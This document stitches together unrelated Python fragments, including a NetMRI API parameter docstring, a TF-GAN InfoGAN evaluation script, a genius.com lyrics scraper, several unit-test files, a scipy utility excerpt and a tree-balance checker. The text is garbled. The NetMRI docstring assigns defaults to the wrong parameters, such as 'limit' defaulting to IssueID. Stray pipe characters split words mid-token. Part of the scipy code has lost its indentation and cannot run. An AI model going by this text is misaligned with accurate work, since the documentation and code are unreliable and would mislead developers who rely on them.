:param op_VlanID: The operator to apply to the field VlanID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanID: The internal NetMRI identifier of the VLAN to which this issue applies, if relevant. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanID: If op_VlanID is specified, the field named in this input will be compared to the value in VlanID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanID must be specified if op_VlanID is specified.
:type val_f_VlanID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanID: If op_VlanID is specified, this value will be compared to the value in VlanID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanID must be specified if op_VlanID is specified.
:type val_c_VlanID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the issue details as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of issue detail methods. The listed methods will be called on each issue detail returned and included in the output. Available methods are: data_source, device, interface, iprg, vlan, subnet, alternate_device, issue_desc, title, severity, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, iprg, vlan, subnet, alternate_device, issue_desc.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` IssueID
:param sort: The data field(s) to use for sorting the output. Default is IssueID. Valid values are DataSourceID, IssueID, StartTime, EndTime, ChangedCols, Timestamp, IssueTypeID, DetailID, DeviceID, InterfaceID, VlanID, SubnetID, IprgID, BatchID, AltDeviceID, Criteria, IssueValue, Component, SeverityID, Correctness, Stability, SuppressedInd.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each IssueDetail. Valid values are DataSourceID, IssueID, StartTime, EndTime, ChangedCols, Timestamp, IssueTypeID, DetailID, DeviceID, InterfaceID, VlanID, SubnetID, | IprgID, BatchID, AltDeviceID, Criteria, IssueValue, Component, SeverityID, Correctness, Stability, SuppressedInd. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
|
# coding=utf-8
# Copyright 2022 The TensorFlow GAN Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless | required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Evaluates an InfoGAN TFGAN trained MNI | ST model.
The image visualizations, as in https://arxiv.org/abs/1606.03657, show the
effect of varying a specific latent variable on the image. Each visualization
focuses on one of the three structured variables. Columns have two of the three
variables fixed, while the third one is varied. Different rows have different
random samples from the remaining latents.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
import tensorflow.compat.v1 as tf
from tensorflow_gan.examples.mnist import infogan_eval_lib
flags.DEFINE_string('checkpoint_dir', '/tmp/mnist/',
                    'Directory where the model was written to.')
flags.DEFINE_string('eval_dir', '/tmp/mnist/',
                    'Directory where the results are saved to.')
flags.DEFINE_integer(
    'noise_samples', 6,
    'Number of samples to draw from the continuous structured '
    'noise.')
flags.DEFINE_integer('unstructured_noise_dims', 62,
                     'The number of dimensions of the unstructured noise.')
flags.DEFINE_integer('continuous_noise_dims', 2,
                     'The number of dimensions of the continuous noise.')
flags.DEFINE_integer(
    'max_number_of_evaluations', None,
    'Number of times to run evaluation. If `None`, run '
    'forever.')
# Help text fixed: the flag controls whether images are *written* to disk.
flags.DEFINE_boolean('write_to_disk', True, 'If `True`, write images to disk.')
FLAGS = flags.FLAGS
def main(_):
    # Bundle all flag values into an HParams tuple and run the (blocking)
    # evaluation loop implemented in infogan_eval_lib.
    hparams = infogan_eval_lib.HParams(
        FLAGS.checkpoint_dir, FLAGS.eval_dir, FLAGS.noise_samples,
        FLAGS.unstructured_noise_dims, FLAGS.continuous_noise_dims,
        FLAGS.max_number_of_evaluations,
        FLAGS.write_to_disk)
    infogan_eval_lib.evaluate(hparams, run_eval_loop=True)
if __name__ == '__main__':
    # This example relies on TF1-style graph-mode execution.
    tf.disable_v2_behavior()
    app.run(main)
|
import re
from bs4 import BeautifulSoup
from ..const import constant
from ..bsopener import BSOpener
class RGArtist(object):
    """RapGeniusArtist

    Scrapes an artist's song listing and lyrics from genius.com pages.
    """
    class _Const(object):
        """ Contains constants used in outer class """
        @constant
        def RG_ARTIST_BASE_URL():
            return "http://genius.com/artists/"
        @constant
        def RG_ARTIST_SONGS_BASE_URL():
            return "http://genius.com/artists/songs?for_artist_page="
        @constant
        def RG_ARTIST_PAGENUM_PREF():
            """ Prefix for page number """
            return "&page="
    def __init__(self, artist_url):
        self.CONST = self._Const()
        self.urlopener = BSOpener()
        self.artist_url = artist_url
        self.artist_id = self._get_artist_id(self.artist_url) # numerical artist id
        self.artist_songs = self.CONST.RG_ARTIST_SONGS_BASE_URL + self.artist_id
    @classmethod
    def from_artist_name(cls, artist_name):
        """ Returns a new instance of RGArtist from artist name
        Assumes that the artist url is in the form
        http://genius.com/artists/<artist_name>, where
        <artist_name> is the artist_name provided as an
        argument with spaces replaced by "-" and "." removed. This method might return
        a bogus url, since RapGenius doesn't seem to be following any convention for
        the names (for example, sometimes "." in names simply get removed, while in
        other instances they get replaced by "-").
        """
        return RGArtist(cls._Const().RG_ARTIST_BASE_URL + artist_name.replace(" ", "-").replace(".", ""))
    def _get_artist_id(self, artist_url):
        """ Returns the numeric id of the artist """
        # The numeric id is the trailing number of the iPhone app deep-link
        # advertised in the page's <meta> tags.
        bsObj = self.urlopener.bsopen(artist_url)
        content_val = bsObj.find("meta", {"property":"twitter:app:url:iphone"}).attrs["content"]
        return re.findall("[0-9]+$", content_val)[0]
    def _get_songs_BSObj(self, page_num=1):
        """ Returns a list of song BeautifulSoup objects
        The returned list contains the <li>'s of each song, the song url and other info,
        such as the song title, can be extracted from it.
        Returns:
            list: list of song BeautifulSoup objects if there is at least one song on the page
            None: if there are no songs on the page
        """
        page_url = self.artist_songs + self.CONST.RG_ARTIST_PAGENUM_PREF + str(page_num)
        print("Page url = " + page_url)  # debug output
        bsObj = self.urlopener.bsopen(page_url)
        song_container = bsObj.find("ul", {"class":["song_list", "primary_list"]})
        if song_container is None:
            return None # no songs found on the page
        return song_container.findAll("li")
    def _get_song_text_BSObj(self, song_url):
        """ Returns BeautifulSoup object with the lyrics content

        Fixed: the previous chained ``find(...).find("p")`` raised an
        AttributeError whenever the page had no <lyrics> element; we now
        return None in that case, matching the documented contract.
        """
        bsObj = self.urlopener.bsopen(song_url)
        if bsObj is None:
            return None
        lyrics = bsObj.find("lyrics", {"class":"lyrics"})
        return lyrics.find("p") if lyrics is not None else None
    def get_song_urls(self, page_num=1):
        """ Return a list of song urls from page page_num.
        Returns:
            list: list of song urls (as strings) if there is at least one song on the page
            None: if there are no songs on the page
        """
        bsObj_list = self._get_songs_BSObj(page_num)
        if bsObj_list is None:
            return None # no songs found on the page
        song_urls = [] # contains the list of song urls found on the page
        # not using list comprehension because we want to filter out None's
        for bsObj in bsObj_list:
            anchor = bsObj.find("a", {"class":"song_link"})
            # make sure that we don't include any None's in our urls list
            if anchor is not None:
                url = anchor.attrs["href"]
                if url is not None:
                    song_urls += [url]
        # we don't want to return empty lists
        return song_urls if len(song_urls) > 0 else None
    def get_songs_title(self, page_num=1):
        """ Return a list of song titles from page page_num.
        Returns:
            list: list of song titles (as strings) if there is at least one song on the page
            None: if there are no songs on the page
        """
        bsObj_list = self._get_songs_BSObj(page_num)
        if bsObj_list is None:
            return None # no songs found on the page
        song_titles = [] # contains the list of song titles found on the page
        # not using list comprehension because we want to filter out None's
        for bsObj in bsObj_list:
            span = bsObj.find("span", {"class":"song_title"})
            # make sure that we don't include any None's or empty strings in our titles list
            if span not in [None, ""]:
                title = span.get_text()
                if title is not None:
                    song_titles += [title]
        # we don't want to return empty lists
        return song_titles if len(song_titles) > 0 else None
    def get_song_text(self, url):
        """ Returns song text as a string (empty string if unavailable) """
        # Removed the unused local `result` that the old version assigned
        # and never read.
        bsObj = self._get_song_text_BSObj(url)
        return "".join(bsObj.find_all(text=True)) if bsObj is not None else ""
    def get_song_title(self, url):
        """ Returns song title as a string """
        # TODO: not implemented yet
        pass
|
# Names exported via `from <package> import *`: one entry per test module.
__all__ = ["test_avl", "test_binary", "test_bloom", "test_fortune", "test_hashtable",
           "test_kd", "test_kd_factory", "test_knapsack", "test_mergesort", "test_quad",
           "test_R"]
import os
import sys
sys.path.insert(0,os.path.abspath(__file__+"/../.."))
import unittest
import json
from transgression import config
class ConfigTest(unittest.TestCase):
    """Tests for decoding, mutating and re-encoding the transgression
    configuration JSON."""
    def setUp(self):
        # Use a context manager so the fixture file handle is not leaked
        # (the old version called open(...).read() and never closed it).
        data_path = os.path.abspath(
            os.path.dirname(os.path.realpath(__file__)) + "/data/testConfig.json")
        with open(data_path, 'r') as config_file:
            self.mJsonString = config_file.read()
    def test_configuration_construction(self):
        # assertEquals is a deprecated alias (removed in Python 3.12);
        # use assertEqual throughout.
        configObj = json.loads(self.mJsonString, object_hook=config.config_decoder)
        self.assertTrue(configObj.hasApplication('Jingit'))
        self.assertEqual('Jingit', configObj.getApplication('Jingit').getAppName())
        self.assertEqual('air.com.jingit.mobile', configObj.getApplication('Jingit').getPlatformConfiguration('android').getProcessName())
        self.assertEqual(2009, configObj.getApplication('Jingit').getPlatformConfiguration('android').getFirstBinaryDate().year)
        self.assertEqual('sftp', configObj.getApplication('Jingit').getPlatformConfiguration('android').getBinaryRepository().getProtocol())
        self.assertEqual('jenkinsmonkey.local/APKS/%year%-%month%-%day%/%time%/%commitid%/%appname%-debug-%buildnumber%.apk', configObj.getApplication('Jingit').getPlatformConfiguration('android').getBinaryRepository().getLocationFormatString())
    def test_configuration_add_application(self):
        # Adding a new application from a plain dict must round-trip
        # through the same accessors as decoded configuration.
        configObj = json.loads(self.mJsonString, object_hook=config.config_decoder)
        platformConfigDict = { 'windows' : { 'firstBinaryDate' : '2010-01-01', 'processName' : 'Jingit-bin', 'binaryRepository' : { 'protocol' : 'sftp', 'location': 'www.google.com'}}}
        configObj.addApplication('testApp', platformConfigDict)
        self.assertTrue(configObj.hasApplication('testApp'))
        self.assertEqual('testApp', configObj.getApplication('testApp').getAppName())
        self.assertEqual('Jingit-bin', configObj.getApplication('testApp').getPlatformConfiguration('windows').getProcessName())
        self.assertEqual(2010, configObj.getApplication('testApp').getPlatformConfiguration('windows').getFirstBinaryDate().year)
        self.assertEqual('sftp', configObj.getApplication('testApp').getPlatformConfiguration('windows').getBinaryRepository().getProtocol())
        self.assertEqual('www.google.com', configObj.getApplication('testApp').getPlatformConfiguration('windows').getBinaryRepository().getLocationFormatString())
    def test_json_encoding(self):
        # Encoders must emit the exact expected strings, both when called
        # directly and when used as a `cls` for json.dumps.
        configObj = json.loads(self.mJsonString, object_hook=config.config_decoder)
        app = configObj.getApplication('Jingit')
        platConfig = app.getPlatformConfiguration('android')
        binRepo = platConfig.getBinaryRepository()
        expectedBinaryRepoOutput = "{ 'protocol' : 'sftp', 'location' : 'jenkinsmonkey.local/APKS/%year%-%month%-%day%/%time%/%commitid%/%appname%-debug-%buildnumber%.apk'}"
        self.assertEqual(expectedBinaryRepoOutput, config.BinaryRepositoryEncoder.encode(binRepo))
        self.assertEqual(expectedBinaryRepoOutput, json.dumps(binRepo, cls=config.BinaryRepositoryEncoder))
        expectedPlatConfigOutput = "{ 'processName' : 'air.com.jingit.mobile', 'firstBinaryDate' : '2009-01-01', 'binaryRepository' : " + expectedBinaryRepoOutput + "}"
        self.assertEqual(expectedPlatConfigOutput, config.PlatformConfigurationEncoder.encode(platConfig))
        self.assertEqual(expectedPlatConfigOutput, json.dumps(platConfig, cls=config.PlatformConfigurationEncoder))
        expectedAppConfigOutput = "{ 'Jingit': { 'platformConfigurations' : { " + expectedPlatConfigOutput + "}}}"
        self.assertEqual(expectedAppConfigOutput, config.ApplicationConfigEncoder.encode(app))
        self.assertEqual(expectedAppConfigOutput, json.dumps(app, cls=config.ApplicationConfigEncoder))
        expectedConfigOutput = "{ '__type__' : 'transgression-configuration', 'applications' : " + expectedAppConfigOutput + "}}"
        self.assertEqual(expectedConfigOutput, config.ConfigEncoder.encode(configObj))
        self.assertEqual(expectedConfigOutput, json.dumps(configObj, cls=config.ConfigEncoder, indent=2))
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
|
from pyscf.pbc.gto import Cell
from pyscf.pbc.scf import RHF
from pyscf.pbc.tdscf import TDHF
from pyscf.pbc.tdscf.rhf_slow import PhysERI, PhysERI4, PhysERI8, TDRHF
from pyscf.tdscf.common_slow import eig
from test_common import retrieve_m, retrieve_m_hf, assert_vectors_close
import unittest
from numpy import testing
class DiamondTestGamma(unittest.TestCase):
    """Compare this (rhf_slow) vs reference (pyscf)."""
    @classmethod
    def setUpClass(cls):
        # One-time setup for the whole class: build a (deliberately
        # distorted) diamond cell with a minimal basis, converge RHF, and
        # run the reference pyscf TDHF to compare against.
        cls.cell = cell = Cell()
        # Lift some degeneracies
        cell.atom = '''
        C 0.000000000000 0.000000000000 0.000000000000
        C 1.67 1.68 1.69
        '''
        cell.basis = {'C': [[0, (0.8, 1.0)],
                            [1, (1.0, 1.0)]]}
        # cell.basis = 'gth-dzvp'
        cell.pseudo = 'gth-pade'
        cell.a = '''
        0.000000000, 3.370137329, 3.370137329
        3.370137329, 0.000000000, 3.370137329
        3.370137329, 3.370137329, 0.000000000'''
        cell.unit = 'B'
        cell.verbose = 5
        cell.build()
        cls.model_rhf = model_rhf = RHF(cell)
        model_rhf.kernel()
        cls.td_model_rhf = td_model_rhf = TDHF(model_rhf)
        td_model_rhf.nroots = 5
        td_model_rhf.kernel()
        # Reference TDHF matrix extracted from the converged pyscf model.
        cls.ref_m_rhf = retrieve_m(td_model_rhf)
    @classmethod
    def tearDownClass(cls):
        # These are here to remove temporary files
        del cls.td_model_rhf
        del cls.model_rhf
        del cls.cell
    def test_eri(self):
        """Tests all ERI implementations: with and without symmetries."""
        for eri in (PhysERI, PhysERI4, PhysERI8):
            try:
                e = eri(self.model_rhf)
                m = e.tdhf_full_form()
                # Test matrix vs ref
                testing.assert_allclose(m, retrieve_m_hf(e), atol=1e-14)
                # Test matrix vs pyscf
                testing.assert_allclose(self.ref_m_rhf, m, atol=1e-14)
                vals, vecs = eig(m, nroots=self.td_model_rhf.nroots)
                testing.assert_allclose(vals, self.td_model_rhf.e, atol=1e-5)
            except Exception:
                # Name the failing ERI class before re-raising.
                print("When testing {} the following exception occurred:".format(eri))
                raise
    def test_class(self):
        """Tests container behavior."""
        model = TDRHF(self.model_rhf)
        model.nroots = self.td_model_rhf.nroots
        assert model.fast
        e, xy = model.kernel()
        model.fast = False
        model.kernel()
        # Slow vs fast
        testing.assert_allclose(model.e, e)
        assert_vectors_close(model.xy, xy)
        # ... vs ref
        testing.assert_allclose(model.e, self.td_model_rhf.e, atol=1e-12)
        assert_vectors_close(model.xy, self.td_model_rhf.xy, atol=1e-12)
        # Test real
        testing.assert_allclose(model.e.imag, 0, atol=1e-8)
    def test_cplx(self):
        """Tests whether complex conjugation is handled correctly."""
        # Perform mf calculation
        model_rhf = RHF(self.cell)
        model_rhf.kernel()
        # Add random phases
        import numpy
        numpy.random.seed(0)
        p = numpy.exp(2.j * numpy.pi * numpy.random.rand(model_rhf.mo_coeff.shape[1]))
        model_rhf.mo_coeff = model_rhf.mo_coeff * p[numpy.newaxis, :]
        m_ref = PhysERI(model_rhf).tdhf_full_form()
        td_model_rhf = TDRHF(model_rhf)
        assert not td_model_rhf.fast
        td_model_rhf.kernel()
        with self.assertRaises(ValueError):
            td_model_rhf.fast = True
            td_model_rhf.kernel()
        # With complex orbitals the fast (8-fold) path raises and the
        # 4-fold PhysERI4 implementation is used instead.
        self.assertIsInstance(td_model_rhf.eri, PhysERI4)
        m = td_model_rhf.eri.tdhf_full_form()
        testing.assert_allclose(m, m_ref, atol=1e-14)
|
dtype = np.dtype(dtype)
if align is None:
align = dtype.alignment
if not hasattr(shape, '__len__'):
shape = (shape,)
size = functools.reduce(operator.mul, shape) * dtype.itemsize
buf = np.empty(size + align + 1, np.uint8)
offset = buf.__array_interface__['data'][0] % align
if offset != 0:
offset = align - offset
# Note: slices producing 0-size arrays do not necessarily change
# data pointer --- so we use and allocate size+1
buf = buf[offset:offset+size+1][:-1]
data = np.ndarray(shape, dtype, buf, order=order)
data.fill(0)
return data
def _prune_array(array):
"""Return an array equivalent to the input array. If the input
array is a view of a much larger array, copy its contents to a
newly allocated array. Otherwise, return the input unchanged.
"""
if array.base is not None and array.size < array.base.size // 2:
return array.copy()
return array
def prod(iterable):
    """
    Product of a sequence of numbers.
    Faster than np.prod for short lists like array shapes, and does
    not overflow if using Python integers.
    """
    # Same left-fold the explicit loop performed; starts from 1 so an
    # empty iterable yields 1.
    return functools.reduce(operator.mul, iterable, 1)
def float_factorial(n: int) -> float:
    """Compute the factorial and return as a float

    Returns infinity when result is too large for a double
    """
    # 171! exceeds the largest finite double, so short-circuit to inf.
    if n >= 171:
        return np.inf
    return float(math.factorial(n))
class DeprecatedImport(object):
    """
    Deprecated import with redirection and warning.

    Examples
    --------
    Suppose you previously had in some module::
        from foo import spam
    If this has to be deprecated, do::
        spam = DeprecatedImport("foo.spam", "baz")
    to redirect users to use "baz" module instead.
    """
    def __init__(self, old_module_name, new_module_name):
        self._old_name = old_module_name
        self._new_name = new_module_name
        # Import eagerly so a bad replacement name fails at construction.
        __import__(self._new_name)
        self._mod = sys.modules[self._new_name]
    def __dir__(self):
        # Delegate introspection to the replacement module.
        return dir(self._mod)
    def __getattr__(self, name):
        # Warn on every attribute access, then forward to the target.
        warnings.warn(
            "Module %s is deprecated, use %s instead" % (self._old_name,
                                                         self._new_name),
            DeprecationWarning)
        return getattr(self._mod, name)
# copy-pasted from scikit-learn utils/validation.py
def check_random_state(seed):
    """Turn seed into a np.random.RandomState instance
    If seed is None (or np.random), return the RandomState singleton used
    by np.random.
    If seed is an int, return a new RandomState instance seeded with seed.
    If seed is already a RandomState instance, return it.
    If seed is a new-style np.random.Generator, return it.
    Otherwise, raise ValueError.
    """
    if seed is None or seed is np.random:
        return np.random.mtrand._rand
    if isinstance(seed, (numbers.Integral, np.integer)):
        return np.random.RandomState(seed)
    if isinstance(seed, np.random.RandomState):
        return seed
    # np.random.Generator exists only on numpy >= 1.17; probe for it
    # instead of catching AttributeError.
    generator_cls = getattr(np.random, 'Generator', None)
    if generator_cls is not None and isinstance(seed, generator_cls):
        return seed
    raise ValueError('%r cannot be used to seed a numpy.random.RandomState'
                     ' instance' % seed)
def _asarray_validated(a, check_finite=True,
sparse_ok=False, objects_ok=False, mask_ok=False,
as_inexact=False):
"""
Helper function for SciPy argument validation.
Many SciPy linear algebra functions do support arbitrary array-like
input arguments. Examples of commonly unsupported inputs include
matrices containing inf/nan, sparse matrix representations, and
matrices with complicated elements.
Parameters
----------
a : array_like
The array-like input.
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Default: True
sparse_ok : bool, optional
True if scipy sparse matrices are allowed.
objects_ok : bool, optional
True if arrays with dype('O') are allowed.
mask_ok : bool, optional
True if masked arrays are allowed.
as_inexact : bool, optional
True to convert the input array to a np.inexact dtype.
Returns
-------
ret : ndarray
The converted validated array.
"""
if not sparse_ok:
import scipy.sparse
if scipy.sparse.issparse(a):
msg = ('Sparse matrices are not supported by this function. '
'Perhaps one of the scipy.sparse.linalg functions '
'would work instead.')
raise ValueError(msg)
if not mask_ok:
if np.ma.isMaskedArray(a):
raise ValueError('masked arrays are not supported')
toarray = np.asarray_chkfinite if check_finite else np.asarray
a = toarray(a)
if not objects_ok:
if a.dtype is np.dtype('O'):
raise ValueError('object arrays are not supported')
if as_inexact:
if not np.issubdtype(a.dtype, np.inexact):
a = toarray(a, dtype=np.float_)
return a
# Add a replacement for inspect.getfullargspec()/
# The version below is borrowed from Django,
# https://github.com/django/django/pull/4846.
# Note an inconsistency between inspect.getfullargspec(func) and
# inspect.signature(func). If `func` is a bound method, the latter does *not*
# list `self` as a first argument, while the former *does*.
# Hence, cook up a common ground replacement: `getfullargspec_no_self` which
# mimics `inspect.getfullargspec` but does not list `self`.
#
# This way, the caller code does not need to know whether it uses a legacy
# .getfullargspec or a bright and shiny .signature.
# Result container mirroring inspect.FullArgSpec.
FullArgSpec = namedtuple('FullArgSpec',
                         ['args', 'varargs', 'varkw', 'defaults',
                          'kwonlyargs', 'kwonlydefaults', 'annotations'])
def getfullargspec_no_self(func):
    """inspect.getfullargspec replacement using inspect.signature.
    If func is a bound method, do not list the 'self' parameter.
    Parameters
    ----------
    func : callable
        A callable to inspect
    Returns
    -------
    fullargspec : FullArgSpec(args, varargs, varkw, defaults, kwonlyargs,
                              kwonlydefaults, annotations)
        NOTE: if the first argument of `func` is self, it is *not*, I repeat
        *not*, included in fullargspec.args.
        This is done for consistency between inspect.getargspec() under
        Python 2.x, and inspect.signature() under Python 3.x.
    """
    sig = inspect.signature(func)
    params = list(sig.parameters.values())
    positional_kinds = (inspect.Parameter.POSITIONAL_OR_KEYWORD,
                       inspect.Parameter.POSITIONAL_ONLY)
    args = [p.name for p in params if p.kind in positional_kinds]
    # First (and only) VAR_POSITIONAL / VAR_KEYWORD name, or None.
    varargs = next((p.name for p in params
                    if p.kind == inspect.Parameter.VAR_POSITIONAL), None)
    varkw = next((p.name for p in params
                  if p.kind == inspect.Parameter.VAR_KEYWORD), None)
    defaults = tuple(p.default for p in params
                     if (p.kind == inspect.Parameter.POSITIONAL_OR_KEYWORD
                         and p.default is not p.empty)) or None
    kwonlyargs = [p.name for p in params
                  if p.kind == inspect.Parameter.KEYWORD_ONLY]
    kwdefaults = {p.name: p.default for p in params
                  if p.kind == inspect.Parameter.KEYWORD_ONLY
                  and p.default is not p.empty}
    annotations = {p.name: p.annotation for p in params
                   if p.annotation is not p.empty}
    # Empty kwonly-defaults dict collapses to None, matching
    # inspect.getfullargspec's convention.
    return FullArgSpec(args, varargs, varkw, defaults, kwonlyargs,
                       kwdefaults or None, annotations)
class MapWrapper(object):
"""
Parallelisation wrapper for wor |
import os
import unittest
import tempfile
from git import Repo
from oeqa.utils.commands import get_bb_var
from oe.buildhistory_analysis import blob_to_dict, compare_dict_blobs
class TestBlobParsing(unittest.TestCase):
    """Tests converting buildhistory git blobs to dictionaries and
    comparing them."""
    def setUp(self):
        # (Removed an unused `import time` that was here.)
        self.repo_path = tempfile.mkdtemp(prefix='selftest-buildhistory',
                                          dir=get_bb_var('TOPDIR'))
        self.repo = Repo.init(self.repo_path)
        self.test_file = "test"
        # Mirrors the variable assignments currently committed to the repo.
        self.var_map = {}
    def tearDown(self):
        import shutil
        shutil.rmtree(self.repo_path)
    def commit_vars(self, to_add=None, to_remove=None, msg="A commit message"):
        """Apply additions/removals to var_map, rewrite the file, commit.

        Bug fixes: the removal loop previously popped the undefined name
        `x` instead of the loop variable `k` (a NameError whenever
        to_remove was non-empty), and the mutable default arguments
        ({} / []) are replaced with the None idiom.
        """
        to_add = {} if to_add is None else to_add
        to_remove = [] if to_remove is None else to_remove
        if len(to_add) == 0 and len(to_remove) == 0:
            return
        for k in to_remove:
            self.var_map.pop(k, None)
        for k in to_add:
            self.var_map[k] = to_add[k]
        with open(os.path.join(self.repo_path, self.test_file), 'w') as repo_file:
            for k in self.var_map:
                repo_file.write("%s = %s\n" % (k, self.var_map[k]))
        self.repo.git.add("--all")
        self.repo.git.commit(message=msg)
    def test_blob_to_dict(self):
        """
        Test conversion of git blobs to dictionary
        """
        valuesmap = { "foo" : "1", "bar" : "2" }
        self.commit_vars(to_add = valuesmap)
        blob = self.repo.head.commit.tree.blobs[0]
        self.assertEqual(valuesmap, blob_to_dict(blob),
                         "commit was not translated correctly to dictionary")
    def test_compare_dict_blobs(self):
        """
        Test comparison of dictionaries extracted from git blobs
        """
        changesmap = { "foo-2" : ("2", "8"), "bar" : ("","4"), "bar-2" : ("","5")}
        self.commit_vars(to_add = { "foo" : "1", "foo-2" : "2", "foo-3" : "3" })
        blob1 = self.repo.heads.master.commit.tree.blobs[0]
        self.commit_vars(to_add = { "foo-2" : "8", "bar" : "4", "bar-2" : "5" })
        blob2 = self.repo.heads.master.commit.tree.blobs[0]
        change_records = compare_dict_blobs(os.path.join(self.repo_path, self.test_file),
                                            blob1, blob2, False, False)
        var_changes = { x.fieldname : (x.oldvalue, x.newvalue) for x in change_records}
        self.assertEqual(changesmap, var_changes, "Changes not reported correctly")
    def test_compare_dict_blobs_default(self):
        """
        Test default values for comparison of git blob dictionaries
        """
        # PKG/PKGE/PKGV/PKGR get an implicit "default" old value.
        defaultmap = { x : ("default", "1") for x in ["PKG", "PKGE", "PKGV", "PKGR"]}
        self.commit_vars(to_add = { "foo" : "1" })
        blob1 = self.repo.heads.master.commit.tree.blobs[0]
        self.commit_vars(to_add = { "PKG" : "1", "PKGE" : "1", "PKGV" : "1", "PKGR" : "1" })
        blob2 = self.repo.heads.master.commit.tree.blobs[0]
        change_records = compare_dict_blobs(os.path.join(self.repo_path, self.test_file),
                                            blob1, blob2, False, False)
        var_changes = {}
        for x in change_records:
            oldvalue = "default" if ("default" in x.oldvalue) else x.oldvalue
            var_changes[x.fieldname] = (oldvalue, x.newvalue)
        self.assertEqual(defaultmap, var_changes, "Defaults not set properly")
|
import json
from zoom.common.types import UpdateType
class TimeEstimateMessage(object):
    """Accumulating container for timing-update payloads.

    Wraps a plain dict of timing data together with the TIMING_UPDATE
    message type and knows how to serialize itself to JSON.
    """

    def __init__(self):
        self._message_type = UpdateType.TIMING_UPDATE
        self._contents = dict()

    @property
    def message_type(self):
        """The fixed message type tag for this message."""
        return self._message_type

    @property
    def contents(self):
        """The accumulated payload dictionary."""
        return self._contents

    def update(self, item):
        """Merge the given dict into the payload.

        :type item: dict
        """
        self._contents.update(item)

    def combine(self, message):
        """Merge another message's payload into this one.

        :type message: TimeEstimateMessage
        """
        self._contents.update(message.contents)

    def clear(self):
        """Drop all accumulated payload entries."""
        self._contents.clear()

    def to_json(self):
        """Serialize the message type plus payload as a JSON string.

        Payload keys are merged after the type tag, so a payload entry
        named ``update_type`` would override the tag (same as before).
        """
        payload = {"update_type": self._message_type}
        payload.update(self.contents)
        return json.dumps(payload)
|
from __future__ import print_function
from tree import create_tree
def get_height(root):
    """Return the number of nodes on the longest root-to-leaf path."""
    if root is None:
        return 0
    left_height = get_height(root.left)
    right_height = get_height(root.right)
    return 1 + (left_height if left_height > right_height else right_height)
def is_balanced(root):
    """Naive balance check: recomputes subtree heights at every node (O(n^2))."""
    if root is None:
        return True
    heights_ok = abs(get_height(root.left) - get_height(root.right)) <= 1
    return heights_ok and is_balanced(root.left) and is_balanced(root.right)
def get_height2(root):
    """Return the height of *root*, or -1 if any subtree is unbalanced."""
    if root is None:
        return 0
    lh = get_height2(root.left)
    rh = get_height2(root.right)
    # Propagate the unbalanced sentinel, or raise it when heights diverge.
    if lh == -1 or rh == -1 or abs(lh - rh) > 1:
        return -1
    return max(lh, rh) + 1
def is_balanced2(root):
    """O(n) balance check built on get_height2's -1 sentinel."""
    height = get_height2(root)
    return height != -1
def _test():
    """Placeholder for automated checks; intentionally empty."""
    pass
def _print():
    """Build two small trees and print whether each is height-balanced."""
    tree_a = create_tree([1, None, 2, 3])
    tree_b = create_tree([1, 2, 3])
    print(is_balanced(tree_a))
    print(is_balanced(tree_b))
if __name__ == '__main__':
    # Run the (currently empty) self-test, then the demo output.
    _test()
    _print()
|
